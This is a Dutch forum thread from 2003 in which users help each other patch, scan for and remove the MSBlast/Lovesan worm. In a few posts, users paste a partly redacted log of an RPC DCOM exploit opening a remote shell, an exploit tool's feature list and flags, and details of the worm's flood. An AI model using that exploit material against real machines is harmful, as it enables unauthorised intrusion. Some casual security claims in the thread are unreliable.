Neem je whisky mee, is het te weinig... *zucht*
Zucht... Die patch voorkomt dat je besmet raakt door het veiligheidslek te dichten. Die had je dus een paar maanden eerder moeten draaien.Verwijderd schreef op 12 August 2003 @ 16:22:
[...]
Thnx, dat is ook een goede. Maar het rare is dat ik die patch heb gedownt en geinstalleerd maar ik houd de melding. Hoe kom ik hier vanaf? Ik weet intussen ook waar de worm staat. Volstaat het om de msblast.exe te verwijderen?
Wat jij nodig hebt is de removal tool (remove = weghalen).
-eerst de patch daarna Bitdefender er overheen en nog eens met scanms alles nagekeken.
- daarna nog eens met een trojan remover over heel de schijf gegaan.
http://youtube.com/c/Mikesgameworld | Blizzard addict | Gamer pur sang
Verwijderd
Bitdefender Anti-MSBlaster Symantec FixBlaster (HTML) CA CleanProza F-Secure LovSAN removal (TXT) |
Hoe kan ik zien of ik veilig ben? 1) Zet je firewall uit en draai de RPC.Exploit.scanner om te kijken of je systeem gepatched is (test eerst je internet IP, daarna je lokale IP en localhost/127.0.0.1): - ptch = Patched / veilig / ok - VULN = Vulnerable / onveilig / bad - dsbl = Disabled / firewall/router blokkeert - [....] = Timeout / firewall/router dropt / geen response ivm patch NB: - Test ook zonder firewall ! - De scanner wordt door oa KAV ook gedetecteerd als mogelijk onveilig. Dit is normaal. 2) en draai een Trojan/Virusscanner om te zien of je geïnfecteerd bent (Online Scanner: http://housecall.trendmicro.com/) 3) Controlleer met een poortscanner of poort 135 tenminste op stealth of disabled/closed staat: GRC.com |
[ Voor 69% gewijzigd door Verwijderd op 13-08-2003 19:42 ]
Verwijderd
Tip: Windows 3.1 en ouder, Windows 95 / 98 / ME en alle on-Windows operating systemen zijn niet gevoelig voor deze vulnerability, dus dat zijn dan uitstekende PC's om te gebruiken om die patches en tools binnen te halen.
Even ten overvloede: eerst eventuele besmettingen verwijderen (MSBLAST.EXE), daarna Patchen, rebooten en Scannen. Zie oa. ook mijn eerste post in deze thread.
meanie: Dan haal jij de updates toch binnen (corporatewindowsupdate) en zet ze voor haar op CDR ? (iig totdat het is verwerkt in een ServicePack, dan kun je gelijk de SP downloaden) Zo doe ik het hier ook. Dialup of geen Internet hebben is geen smoes om niet te patchen/hotfixen.
kwtemp: De Patch is nodig voor ALLE NT Based Windows. De Blaster worm maakt alleen gebruik van exploits in XP/2K, maar aangezien er meerdere versies in omloop zijn (en de sourcecode gemakkelijk te vinden/aan te passen is) is het een kwestie van tijd totdat ook de NT4 bakken geïnfecteerd raken. Aangeraden wordt dan ook om alle NT-based Windows machines te updaten: Verwijderd in "RPC crash/shutdown 'vraag bak'"
[ Voor 255% gewijzigd door Verwijderd op 13-08-2003 18:03 ]
Kan dit nog komen, of werkt nt wat dat betreft gewoon anders?
het gaat over nt4.0
Verwijderd
Toch jammer dit, 3 jaar lang zonder probs.. dan toch maar een keer die ingebouwde firewall aanzetten..Verwijderd schreef op 12 August 2003 @ 21:38:
Dan haal jij de updates toch binnen en zet ze voor haar op CDR ?
Vorige week was ik er nog en toen was er nog niks aan de hand.. pas sinds paar dagen, en een weekje daarvoor had ik al een keertje geupdate.
[ Voor 22% gewijzigd door Verwijderd op 12-08-2003 21:47 ]
Typisch geval van paranoia of is er iets wat ik moet weten?
My doctor says that I have a malformed public-duty gland and a natural deficiency in moral fibre and that I am therefore excused from saving the world
Vals alarm. Klopt ook wel want die tool doet in wezen hetzelfde als het virus, namelijk testen of een computer kwetsbaar is.YellowCube schreef op 12 August 2003 @ 21:53:
waarom gaat bij mij kaspersky over de rooie op het moment dat ik de "scanms" utility probeer te downloaden? Krijg de mededeling dat het geinfecteerd is met de blastms worm.
Typisch geval van paranoia of is er iets wat ik moet weten?
Verwijderd
Verwijderd in "RPC crash/shutdown 'vraag bak'" / Verwijderd in "RPC crash/shutdown 'vraag bak'"waarom gaat bij mij kaspersky over de rooie op het moment dat ik de "scanms" utility probeer te downloaden? Krijg de mededeling dat het geinfecteerd is met de blastms worm.
Kortom, is normaal.
NT is niet target van Blaster/LoveSAN, maar wel vulnerable voor de RPC-hole. Ongeacht of je een router/firewall hebt wordt aangeraden om te patchen. In jouw geval heb je er goed aan gedaan, maar er zijn ook zat mensen die onterecht menen dat ze dan niet hoeven te patchen. (zie: Verwijderd in "RPC crash/shutdown 'vraag bak'")5 systemen met Windows hier draaien welke gebaseerd zijn op NT. Gelukkig geen last van gehad. Lang leve mijn Freesco router...
[ Voor 58% gewijzigd door Verwijderd op 12-08-2003 22:28 ]
Voor de zekerheid wel even de laatste patches geinstalleerd. Op me werk alleen al honderden telefoontjes gehad over dit probleem, hoorde dat de helpdesk van Microsoft op een gegeven moment zo'n 1800 mensen in de wacht hadden staan.
If someone begins with uncertainty, experience will eventually lead to certainty. But what defines certainty?
Mis alleen nog de NT4 Workstation Workaround aangezien er alleen voor NT 4 server een patch is. (met dcomcnfg.exe dcom uitschakelen)Verwijderd schreef op 12 August 2003 @ 20:57:
Even schaamteloos mezelf copy/pasten:
..
Mooie opsomming
..
[/MESSAGE].
[ Voor 151% gewijzigd door TAMW op 12-08-2003 22:31 ]
Verwijderd
Zou jij (of iemand anders) dat kunnen testen, want de Microsoft site is daar een beetje dubbelzinnig over: http://www.microsoft.com/...ity/bulletin/MS03-026.asp -> Additional information about this patch
[ Voor 72% gewijzigd door Verwijderd op 12-08-2003 23:43 ]
Graag ontopic door... b.v.d
Doubt thou the stars are fire; Doubt that the sun doth move; Doubt truth to be a liar; But never doubt I love.
Verwijderd
Verwijderd
[ Voor 3% gewijzigd door Verwijderd op 13-08-2003 01:41 ]
Verwijderd
DCOM got error "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. " attempting to start the service wuauserv with arguments "" in order to run the server:
{E9376CC6-121A-447E-81CF-D8BCC200007C}
Heeft iemand ook zoiets meegemaakt?
Zo ja, hoe los je hier op?
Verwijderd
Er is waarschijnlijk iets fout gegaan tijdens het updaten, of iets mis met je rechtenstructuur als je probleem lijkt op: https://cert.uni-stuttgart.de/.../msg00729.html. Probeer de update eens te deïnstalleren, en kijk dan of het probleem is opgelost. Eventueel zou je dan de update opnieuw kunnen installeren.
reddevil + GbM: Ja
- ptch = Patched / veilig / ok
- VULN = Vulnerable / onveilig / bad
- dsbl = Disabled / firewall/router blokkeert
- [....] = Timeout / firewall/router dropt / geen response ivm patch
NB: Test ook zonder firewall !
Zie: Verwijderd in "RPC crash/shutdown 'vraag bak'"
[ Voor 96% gewijzigd door Verwijderd op 13-08-2003 18:11 ]
- ptch = Patched / veilig / ok
- VULN = Vulnerable / onveilig / bad
- dsbl = Disabled / firewall/router blokkeert (test ook zonder firewall !)
Zoek in het vervolg iets beter
Ik heb deze patch erover gezet en dat is de Blaster virus:
http://www.microsoft.com/...e40f69c074&displaylang=en
Wat moeten ze nou met de info van anderen? Omdat je dus geen firewall erop heb willen ze laten zien hoe onbeschermt je bent. Volgens mij werkt die firewall ook voor geen meter als ze erin willen komen.
I hit the CTRL key, but I'm still not in control!
De shortcut in het Start Menu is een MSI/Windows Installer shortcut, als je die probeert te starten gaan Windows Installer vragen om de source voor installatie.
Is iemand iets dergelijks tegengekomen?
"The problem with internet quotes is that you can't always depend on their accuracy" ~Abraham Lincoln, 1864.
Whehe, ik vind dit steeds grappiger worden terwijl ik er eerst dikke pest in had omdat ik door 20 kennissen werd gebeld en gemaild over dit lekGTA3 schreef op 13 August 2003 @ 09:31:
ben gehacked volgens mij, hij had z'n eigen account aangemaakt, en had mickeysoft als naam.
Veel succes ermee iedereen
Tesla Model Y RWD (2024)
Verwijderd
ik heb hier hetzelfde.... (en dezelfde vraag daardoorreddevil schreef op 13 August 2003 @ 08:54:
Als ik thuis die ms patch heb gedraaid krijg ik bij die scanner onder REMACT [ptch] en onder SYSACT [....] te zien. Is hij dan goed gepatched of niet ?
Nog nooit gehoord van het woord firewall ;-)
Ze wilde weten of ze de computer moest schoonmaken (letterlijk) omdat ze het virus had ;-)
Werken in een computerwinkel is soms ook zo afwisselend ;-)
Ik probeer niet te flamen, maar netjes te reageren hoor.pisart schreef op 13 augustus 2003 @ 09:12:
Euss heeft een paar posts hierboven het al uitgelegd samen met nog heel handige informatie.
- ptch = Patched / veilig / ok
- VULN = Vulnerable / onveilig / bad
- dsbl = Disabled / firewall/router blokkeert (test ook zonder firewall !)
Zoek in het vervolg iets beter
Graag even goed lezen!!!!!
Volgende de site ben je veilig als je onder REMACT en SYSACT allebei ptch hebt staan... wat betekent [....] dan ? En wat is het verschil tussen remact en sysact.
Want hier op m'n werk staan de [....] en [ptch] precies omgedraaid onder remact en sysact als thuis.
[ Voor 8% gewijzigd door reddevil op 13-08-2003 10:57 ]
Bad syntax or keyboard error - enter coffee to continue...
ps: buhh ik word gek van die telefoontjes.. heb er vandaag alweer 10 gehad

[ Voor 53% gewijzigd door Sluuut op 13-08-2003 11:41 ]
57696520646974206c65657374206973206e657264
Verwijderd
De code die naar windowsupdate.com wordt gestuurd, is 40 bytes aan data(een fake SYN packet naar tcp 80), doet dan niets voor 20 miliseconde. Zo kom je uit op 50 packets(8 kbit) per seconde.LMC schreef op 13 August 2003 @ 11:19:
Weet iemand hoe de (D)DoS aanval ingebakken in dit virus/exploit op de windows-update site/server a.s. vrijdag opgezet is? Is dat op basis van een http request in dit virus of ftp of anders? (correct me if im wrong)
De extra info voor degene die dat leuk vindt om te weten
Weet iemand of dit toch een kern van waarheid kan bevatten? Iemand een stukje text uit betrouwbare bron waarin over het jatten van persoonlijke info wordt gesproken?
Zoef
Hmm, zeg dat Microsoft een 1 GB lijn hebben voor die windowsupdate site. Dan zouden er dus meer dan 1 miljoen geinfecteerde computers tegelijk moeten gaan flooden om de site down te krijgen. Zou dat gebeuren?Verwijderd schreef op 13 augustus 2003 @ 11:37:
[...]
De code die naar windowsupdate.com wordt gestuurd, is 40 bytes aan data(een fake SYN packet naar tcp 80), doet dan niets voor 20 miliseconde. Zo kom je uit op 50 packets(8 kbit) per seconde.
De extra info voor degene die dat leuk vindt om te weten.
Verwijderd
Volgens het nieuws verstuurt het virus vrijdag e-mailtjes naar microsoft om de server plat te leggenZpottr schreef op 13 August 2003 @ 11:42:
het nieuws gehoord had dat er ook credit card info e.d. gejat zou kunnen worden.

Het enige wat het ding doet is zich verspreiden, en dan die DDoS, het is wel zo dat als iemand een tool gebruikt die de exploit exploiteert, ze volledige controle over de pc hebben, maar met dit virus niet.
/me ergerde zich gister helemaal rot aan al die verkeerde info
Het is wachten op iemand die dit gat gaat gebruiken om een exploit te schrijven die wél stoute dingen doet.Verwijderd schreef op 13 augustus 2003 @ 11:47:
[...]
Volgens het nieuws verstuurt het virus vrijdag e-mailtjes naar microsoft om de server plat te leggen.
Het enige wat het ding doet is zich verspreiden, en dan die DDoS, het is wel zo dat als iemand een tool gebruikt die de exploit exploiteert, ze volledige controle over de pc hebben, maar met dit virus niet.
/me ergerde zich gister helemaal rot aan al die verkeerde info
De islam kan uw vrijheid schaden
Verwijderd
Die zijn er al hoor, genoeg tools, zelfs met een GUI, dus je hoeft nog niet eens meer lastig te doen met een command prompt, zodat zelfs je zusje van drie iemand kan 'hacken'.Wokschotel schreef op 13 augustus 2003 @ 11:55:
[...]
Het is wachten op iemand die dit gat gaat gebruiken om een exploit te schrijven die wél stoute dingen doet.
En het leuke is, elke dag komen er weer een paar nieuwe bij, ik vraag me echt af hoeveel mensen er al niet geïnfecteerd zijn met zulk soort zooi, want er worden ook elke keer iets andere backdoors bij gebruikt enzo..
Het is flink werken voor de AVs op het moment.
Het is een LEK in Windows, wat al eerder door hackers werd gebruikt. Nu is er een virus voor. Dat Virus gaat geen credit card gegevens van de pc afhalen, hackers (personen die door dezelfde lek in de computer gaan rondkijken) kunnen dat echter wel (als het erop staat... d0h), maargoed dat konden ze de afgelopen 2 weken dan ook al.Zpottr schreef op 13 August 2003 @ 11:42:
De PC van mijn ouders is ook besmet (...), en ik heb mijn pa alle info gegeven om de boel te verwijderen. Nu werd ik net gebeld door een ongeruste moeder die op het nieuws gehoord had dat er ook credit card info e.d. gejat zou kunnen worden. In de write-ups van de anti-virus fabrikanten vind ik hier niets over, en in dit topic komt de string 'cred' niet voor. Ik heb haar dan ook verteld dat dit niet waar is.
Weet iemand of dit toch een kern van waarheid kan bevatten? Iemand een stukje text uit betrouwbare bron waarin over het jatten van persoonlijke info wordt gesproken?
ps: zowiezo, ben je naar mening redelijk idioot bezig als je je eigen crdit card gegevens op je pc gaat bewaren

[ Voor 7% gewijzigd door Sluuut op 13-08-2003 12:28 ]
57696520646974206c65657374206973206e657264
Verwijderd
Zoals ik al schreef, die PC bij m'n ouders is besmet met de standaard variant van dit onding, staat nu uit en wordt vanavond gepatched. Dus dan zal 't allemaal wel goed komen.
Zoef
Heb hier maar een stuk of 30 laptops geinfecteerd staan, das wel knap want de servers hebbe nergens last van
De cleaning tool van NAI / McAfee doet het niet in alle gevallen, degene die tot nu toe de beste resultaten opleverd is die van symantec (fixtool for win32.blaster.worm aka fixblaster.exe)
Bad syntax or keyboard error - enter coffee to continue...
Verwijderd
[ Voor 20% gewijzigd door LMC op 13-08-2003 12:58 ]
Bad syntax or keyboard error - enter coffee to continue...
Waarom geeft windowsupdate de patch niet weer, terwijl ik hem er nog niet op had staan. Of had ik hem er wel opstaan (zeer waarschijnlijk), maar is hij overschreven door sp4 en ziet windowsupdate dat je hem ooit al gedownload hebt ?
Leven is als een pijpkaneel, iedereen zuigt eraan en krijgt zijn deel.
Onder XP met de windowsupdate in de taakbalk is het lek wel automatisch gepatched
tyrips, tywreps, tiewreps, tiereps, tie raps, ripties, taiwraps, kabelbindbandjes » Tie Wraps
\o/
Verwijderd
En tja zelf heb ik geen last van. Winroute pro dropped alle ongevraagde packets.
Met xp heb je waarschijnlijk sp1 al geinstalleerd, voor de patch onder win2k heb je sp4 nodigStarLite schreef op 13 August 2003 @ 13:06:
Wel apart, ik heb paar dagen terug nog windowsupdate gedaan en ALLE patches behalve SP4 geinstalleerd, maar volgens de scanner ben ik nog steeds Vulnerable[win2K pro]
Onder XP met de windowsupdate in de taakbalk is het lek wel automatisch gepatched
De scanner is ook niet helemaal accuraat, lees de ReadMe eens...StarLite schreef op 13 August 2003 @ 13:06:
Wel apart, ik heb paar dagen terug nog windowsupdate gedaan en ALLE patches behalve SP4 geinstalleerd, maar volgens de scanner ben ik nog steeds Vulnerable[win2K pro]
Onder XP met de windowsupdate in de taakbalk is het lek wel automatisch gepatched
The opinions stated in the above post are purely those of the author,
and do not represent intelligent life of any form.
Verwijderd
ik post dit terwijl ik niet zie wat jullie posten
ik heb hier ook m'n werk een variant te pakken van het virus die svchost.exe doet crashen op windows 2000. En op wonderbaarlijke wijze kan ik topics niet meer inzien hier op GoT. Ik krijg op de frontpage(gathering.tweakers.net) alleen maar het tweakers.net nieuws en mijn bookmarks.
Als ik op het knopje active topics druk krijg ik een lijstje met active topics. Als ik echter een topic aanklik zie ik geen inhoud alleen een "quick reply" boxje.
Zodoende kan ik hier dus ook wat typen, alleen zie ik geen antwoorden
Is deze combinatieal bekend? (dus GoT problems en svchost.exe crash?)
edit: Ik kwam tot de ontdekking dat ik hier ook opera heb, onder opera werkt GoT prima..., windowsupdate.com wordt zo te zien geblokkeerd, ik krijg een witte pagina, bij een collega met unix werkt windowsupdate.com gewoon wel
[ Voor 18% gewijzigd door Verwijderd op 13-08-2003 14:05 ]
Verwijderd
dus das dan wel logisch...
alles is afhankelijk van je RPC.. kijk maar eens bij de service dependency's
dus inbelverbindingen die raar doen, IE die raar doet..
alles komt door die worm..
er is momenteel ook al een variant erop ontdekt... deze maakt gebruik van de RPC bug om remote access op je systeem te kunnen krijgen.
dus gewoon patchen dat ding...
Verwijderd
een? Er zijn er meer dan 30...Verwijderd schreef op 13 augustus 2003 @ 14:08:
er is momenteel ook al een variant erop ontdekt... deze maakt gebruik van de RPC bug om remote access op je systeem te kunnen krijgen.
En er komen elke dag weer nieuwe, als je de mensen op die boards mag geloven zijn er best wel wat mensen de zak..
Verwijderd
Ze meenden dat ze patch een tijdje terug al hadden gedistribueerd naar ieder systeem
Dat zou ik graag willen, maar ook dat werkt nietalles is afhankelijk van je RPC.. kijk maar eens bij de service dependency's
[ Voor 30% gewijzigd door Verwijderd op 13-08-2003 14:23 ]
Verwijderd
Dergelijke tooltjes zien we liever niet hier. Je kunt ze ook voor minder legale doeleinden gebruiken... daarom verwijderd
[ Voor 91% gewijzigd door Han op 13-08-2003 16:32 ]
Verwijderd
De precieze foutmelding bij de installatie van de patch weet ik trouwens (nog) niet.
Verwijderd
Ik heb gewoon windows update gedaan @xp sp1..Verwijderd schreef op 13 August 2003 @ 16:15:
Kennissen van mij met XP SP1 NL geinstalleerd kunnen de gewone XP patch niet installeren. Het lukt hen echter ook niet om de 'embedded' versie (te vinden op www.tweakers.net) te installeren. Is er een oplossing voor het lek in Windows XP SP1 NL?
De precieze foutmelding bij de installatie van de patch weet ik trouwens (nog) niet.
ja lachuh he? ik kwam er ook net achter toen ik bezig was n pctje opniew te installeren.Verwijderd schreef op 13 augustus 2003 @ 16:24:
De Windows Update site is hier vooralsnog onbereikbaar!
na een paar keer f5 dee hij het trouwens wel, maar waarschijnlijk is er dus nu een ddos aan de gang op windowsupdate??
was net al een topic over geopent, maar een grappenmaker heeft m dichtgegooit.
@Cardin.. wel ingelogd als beheerder en de nl patch ervan???
If the world didn't suck, we would all fall off!!!
Verwijderd
Alle servicepacks en overige update's, maar via de scantool van foundstone zie ik nog steeds dat deze vulnerable zijn.
Als ik vervolgens de patch handmatig download en installeer ben ik veilig!
Precies... d'r had daar heel wat af kunnen worden ge-slow-chat ...sharkzor schreef op 13 August 2003 @ 16:27:
[...]
ja lachuh he? ik kwam er ook net achter toen ik bezig was n pctje opniew te installeren.
na een paar keer f5 dee hij het trouwens wel, maar waarschijnlijk is er dus nu een ddos aan de gang op windowsupdate??
was net al een topic over geopent, maar een grappenmaker heeft m dichtgegooit.
Vind het persoonlijk ook wel grappig dat door een gedeeltelijke microsoft hun eigen fout, hun eigen update pagina eruit ligt... Tuurlijk moest iedereen elke dag updaten
57696520646974206c65657374206973206e657264
Verwijderd
Heeft dit nut? Of kan er dan nog steeds een of ander virus binnenslippen?
('k heb Tiny Personal Firewall 5.0)
Als je alleen al dat ziet, is toch reden genoeg om te patchen?
Wat wel "gemeen" is van Microsoft , dat je bij NT4 server bij elke aanpassing de update weer moet installeren, bij NT5.x is dit niet het geval.
Op zich weer een mooi middel op 2003 sneller te implementer.
En nu hebben alle NT4 beheerders weer wat te doen....
"elk nadeel heb z'n voordeel"
[ Voor 6% gewijzigd door weeraanmelden op 13-08-2003 17:43 ]
Verwijderd
ja een legale key gebruiken... een aantal keys werken niet meer, maar als ze windowsupdate draaien krijgen ze dat ook netjes te zienVerwijderd schreef op 13 augustus 2003 @ 16:15:
Kennissen van mij met XP SP1 NL geinstalleerd kunnen de gewone XP patch niet installeren. Het lukt hen echter ook niet om de 'embedded' versie (te vinden op www.tweakers.net) te installeren. Is er een oplossing voor het lek in Windows XP SP1 NL?
De precieze foutmelding bij de installatie van de patch weet ik trouwens (nog) niet.
Ik had het er met mijn broer over: hier speelde ook msblast een rol.
En als je werkt met electronic banking - wat o.a. cookies op je PC zet - ontkom je er niet aan dat creditcard gegevens op je PC staan.
Als ik niet continu dataverkeer op de router had gezien, was ik hier nooit achter gekomen.
[ Voor 15% gewijzigd door Brothar op 13-08-2003 17:53 ]
eagle
Verwijderd
jaja eigen fout... we maken een foutje in de rpc service zodat een of andere gek een ddos kan gaan uitvoeren...Sluuut schreef op 13 August 2003 @ 16:33:
Precies... d'r had daar heel wat af kunnen worden ge-slow-chat ...
Vind het persoonlijk ook wel grappig dat door een gedeeltelijke microsoft hun eigen fout, hun eigen update pagina eruit ligt... Tuurlijk moest iedereen elke dag updaten
Verwijderd
Dus ook als men geen error window krijgt kan je als virus/trojan/wurm op je pc hebben.
[*****@**** rpcexploit]$ ./****-dcom -d 192.168.0.x -t 1
RPC DCOM remote exploit - .:[****.us]:. Security
[+] Resolving host..
[+] Done.
-- Target: [WinXP-Universal]:192.168.0.x:135, Bindshell:666, RET=[0x0100139d]
[+] Connected to bindshell..
-- bling bling --
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
E:\WINDOWS\system32>
Na exit blijft victim PC gewoon draaien zonder rpc af te sluiten of errors te geven.
belangrijke info weggehaald om misbruik te voorkomen.
Maar ik kan dat virus niet ontdekken.. Ik heb Win2k + SP4 en automatic updating staat uit
57696520646974206c65657374206973206e657264
Om generals online te spelen moet ik mijn firewall uitzetten en me pc in DMZ zetten anders werkt het niet,.. meteen na het spelen zet ik alles weer terug. Dus tsja ik denk voor dat uurtje spelen hoef ik verder nix te beveiligen.. WRONG!!
Zijn er mensen die deze regel lezen? Graag terugkoppeling gewenst (onopvallend)
Verwijderd
Verwijderd
Over wat heb je het?Net de nieuwe exploit geprobeerd op mij test PC
Als het wat onbekends is zou ik hem graag willen hebben.
(Ik ben geen hacker, voor als dat nog niet duidelijk was).
Nét Kaspersky e-mail gekregen:
This is because the two versions
of "Lovesan" exploit the same vulnerability in Windows and may co-exist
on the same computer. "In other words all computers infected by the
original "Lovesan" will soon be attacked by its revamped version. -
commented Eugene Kaspersky, Head of Anti-Virus Research for Kaspersky
Labs. - Taking into consideration that the amount of infected systems is
now reaching 300,000 the return of the worm will imply a doubling of
this number and lead to an unpredictable result."
Voor de rest: Zie www.kaspersky.comTechnologically, the new modification of "Lovesan" is a copycat of the
original. Slight changes were applied only to the appearance of the
worm: a new name of the main worm-carrier file (TEEKIDS.EXE instead of
MSBLAST.EXE), new method of the code compression (FSG instead of UPX),
and a new "copyright" strings in the body of the worm abusing Microsoft
and anti-virus developers.
Users of KasperskyR Anti-Virus can be sure this new worm can make no
harm to thier computers. All Kaspersky Labs products effectively detect
both modifications of "Lovesan" generically, without requiring an
update.
No production networks were harmed during this posting
Verwijderd
En de scanner schijnt soms tegenstrijdige informatie te geven of je nu veilig bent of niet:
http://archives.neohapsis...cidents/2003-08/0022.html
http://lists.jammed.com/incidents/2003/08/0026.html
Iemand daar meer info over?
snapnie: Het gaat om de gevallen als je jouw hieronder geposte workaround gebruikt om DCOM services uit te schakelen. Bij mij onder XP sluit gewoon dat dcomcnfg venster zonder mogelijkheid van instelling (localpolicy die beperkt?)
Ik heb mijn verzamelreply maar eens weer geupdate: Verwijderd in "RPC crash/shutdown 'vraag bak'"
Sluuut: Het correcte adres voor Windows Update is windowsupdate.microsoft.com en geen windowsupdate.com. De worm maakt foutief gebruik van het URL windowsupdate.com - mijn aanraden is om nog eens goed te scannen.
[ Voor 78% gewijzigd door Verwijderd op 13-08-2003 19:45 ]
Verwijderd
W2K:
Start->uitvoeren->dcomcnfg
Tabblad Default PRoperties
"Enable Distributed COM on this computer" uitvinken!!
XP:
start->uitvoeren->dcomcnfg
Dubbelklik component services->dubbelklik computers->rechtsklikken op my computer->properties
Tabblad Default Properties
"Enable Distributed COM on this computer" uitvinken!!
Ik weet niet of dit al eerder gepost is, maar gezien de omvang van dit porbleem kan het volgens mij geen kwaad als het er 2 x staat
Ik ben me er niet bewust van dat ik gekke dingen heb gedaan. Zover ik heb gelezen komt de worm dus gewoon je pc binnen zonder dat je er als gebruiker iets aan kunt doen(beveiliging ja, maar dat wordt door de systeembeheerder gedaan op t werk).
Ik wil graag een bevestiging of het mijn schuld is dat de worm op de pc op mijn werk terecht is gekomen, want k voel me er toch beetje **** over.
Verwijderd
[ Voor 64% gewijzigd door Novah op 13-08-2003 19:35 ]
Ok gelukkigVerwijderd schreef op 13 augustus 2003 @ 19:21:
Kayz: Een beetje systeembeheerder heeft allang de exploitscanner gebruikt, de updates gedaan en middels de firewall alle onnodige poorten gedicht. Jij kan er dus niets aan doen als je gewoon medewerker bent in dat bedrijf.
Bedankt jongens, hoef k me niet schuldig te voelen
[ Voor 8% gewijzigd door Kayz op 13-08-2003 19:39 ]
Verwijderd
Sowieso moeten alle ongebruikte poorten dicht staan bij een correct geconfigureerde firewall...
Andere online scanners:
- http://scan.sygatetech.com:443/cgi-bin/probe/quickscan.cgi
- http://scan.sygatetech.com/stealthscan.html
- http://scan.sygatetech.com/trojanscan.html
- http://scan.sygatetech.com/tcpscan.html
- http://scan.sygatetech.com/udpscan.html
- https://nanoprobe.grc.com/x/ne.dll?bh0bkyd2
- http://firewallcheck.com/begin.html
Uitleg/verklaring:
Voor meer informatie: In m'n verzamelreply ben ik bezig om een duidelijke/korte uitleg te geven aan de hand van enkele tests die ik doe op een paar testPC's. Zie verder eerst die poortscanner-websites en Google/GoT-search over het sluiten van poorten/configureren van firewalls/OS'en om dit topic een beetje hanteerbaar te houden.
Novah: ik doe mijn best om de informatie een beetje bij elkaar te houden. Op deze manier is het een beetje overzichtelijk te houden voor iedereen. De FAQ bijhouden is een taak voor de WOS-modjes (ik ben CME en een beetje verdwaalt
In m'n verzamelreply staan directe downloadlinks voor de patches.
(akelige man die Gibson, maar nu wel even handig)
[ Voor 143% gewijzigd door Verwijderd op 13-08-2003 20:31 ]
Ik zag sinds gisteren in mn firewall logs dat er van de geinfecteerde mensen ook een hoop op poort 4444 gaan scannen. 'n stuk of 40 al.
Ff gaan zoeken...en in de 1e post staat dus dit:
KaHTII is een andere RPC-trojan (met oa als doel om virusscanners/firewalls uit te schakelen) die op dit moment nog niet in het wild is gesignaleerd.
Bij dezen,het virus is wild gegaan
Verwijderd
Begrijp alleen neit echt waarom precies naar die poort gescanned word.
Bedoel je niet gewoon dat er connecties gemaakt of geprobeerd worden naar 4444?
Exploit/wurm gaat namelijk connecten naar poort 4444 om te connecten naar de shell.
En inderdaat exploit is nu zwaar public en we zullen er nog tijden last van gaan hebben.
Iedereen die XP weer opnieuw installeerd en vergeet te patchen zal weer de lul zijn.
Vraag me alleen af wanneer er een wurm gaat komen die ECHT schadelijk is.
BV je pc formateerd en van dat soort grappen.
[ Voor 33% gewijzigd door Verwijderd op 13-08-2003 20:03 ]
Verwijderd
Er zijn meer dan 30 varianten die gebruik maken van de exploit, je kan zo echt niet met zekerheid stellen dat het die variant is..
Verwijderd
[ Voor 10% gewijzigd door Verwijderd op 13-08-2003 20:04 ]
Event - TCP_Probe_Other,
Intruder - kbl-tnz764.zeelandnet.nl,
Count - 3
Destination Port -4444,
Target IP - 62.238.45.XXX,
Intruder IP - 62.238.35.XXX
Maar...okay het zouden dus alle varianten kunnen zijn...
Jammer dat je al die mensen niet ff een seintje kan geven ofzo.
Er worden echt zoooveel mensen gefokt,niet normaal!
[ Voor 28% gewijzigd door I Am Weasel op 13-08-2003 20:11 ]
Verwijderd
Over wat heb je het?
Als het wat onbekends is zou ik hem graag willen hebben.
(Ik ben geen hacker, voor als dat nog niet duidelijk was).
"endquote
Ik bedoelde niet zo zeer nieuwe exploit ( blijkt al tijdje online te staan) , bedoelde meer dat deze je pc niet laat crashen.
Je ziet dus niet dat iemand je pc gefucked heeft.
Met MSblast is het toch aardig duidelijk dat er iets fout is met je pc.
Zal dus niet lang duren voordat er een wurm is die totaal ongezien je pc opkomt.
[ Voor 6% gewijzigd door Verwijderd op 13-08-2003 20:14 ]
Verwijderd
yup, zie hier:Verwijderd schreef op 13 August 2003 @ 20:11:
quote:
Over wat heb je het?
Als het wat onbekends is zou ik hem graag willen hebben.
(Ik ben geen hacker, voor als dat nog niet duidelijk was).
"endquote
Ik bedoelde niet zo zeer nieuwe exploit ( blijkt al tijdje online te staan) , bedoelde meer dat deze je pc niet laat crashen.
Je ziet dus niet dat iemand je pc gefucked heeft.
Met MSblast is het toch aardig duidelijk dat er iets fout is met je pc.
Zal dus niet lang duren voordat er een wurm is die totaal ongezien je pc opkomt.
Let op tekst helemaal onderaan
Exploit heb ik ook hierzo, maar dat hou ik maar zo, en ik geef geen URL's weg
Description:
Basically this is a program
to extend the functionality
of the newly discovered RPC
Buffer overflow exploit
affecting all 2k/xp/2003
systems. Features include
a built in FTP server, so
you can easily upload files
to computers you connect to,
and a port scanner to find
affected boxes. Also, more
help and instructions are
provided so you dont need
to be a pro to work this.
You still have to work the
core of the exploit through
command prompt, but it really
isnt that hard.
New in v2:
Uses a differnet exploit which
allows you to define the attack
and shell port (tho i havnt got
any other attack prt then 135 to
work) Also you dont need to select
different SP's to attack for 2k and
xp since they both use a universal
return address wich works on all SP's
Or you can define your own return
addresses if u want to attack a OS
thats in a different language.
A list is included
last thingNew exploit no longer
crashes remote computer when u
dissconnect! yey!
[ Voor 5% gewijzigd door Verwijderd op 13-08-2003 20:17 ]
Verwijderd
-p for port selection as exploit works on ports other than 135(139,445,539 etc)
-l to select bindshell port on remote machine (Default: 666)
Zou dus betekenen dat een wurm een random pport neemt om de shell op te draaien.
Word zo erg moeilijk om te zien met een firewall of het echt een wurm is.
Nog een kleine waarschuwing:
Als iemand exploit online vind ga NIET proberen bij anders mensen of ie werkt als je geen toestemming hebt. ALLES naar poort 135 word nu gifiltert , en je krijgt grote problemen met je isp.
Test het liever thuis of op je eigen netwerk
[ Voor 28% gewijzigd door Verwijderd op 13-08-2003 20:24 ]
Verwijderd
ja msblast is er af, ja ik draai een vuurmuur en ja ik heb die patch
vond et krom want ik heb nog nooit meegemaakt dat explorer.exe zoveel verbindingen maakt. ( lijkt me niet normaal iig
virusscanner vindt niks :f
Verwijderd
Block poort 135 met een goeie firewall patch en update je virus scanner elke dag.
Maar virus-scanners kunnen denk ook niet alles aan zullen versies zijn die nog niet gedetecked worden.
[ Voor 73% gewijzigd door Verwijderd op 13-08-2003 20:28 ]
Er zijn nu dus twee *major* varianten.
Je hebt nu de volgende versies:
- W32/Lovsan.worm (het origineel): http://vil.nai.com/vil/content/v_100547.htm
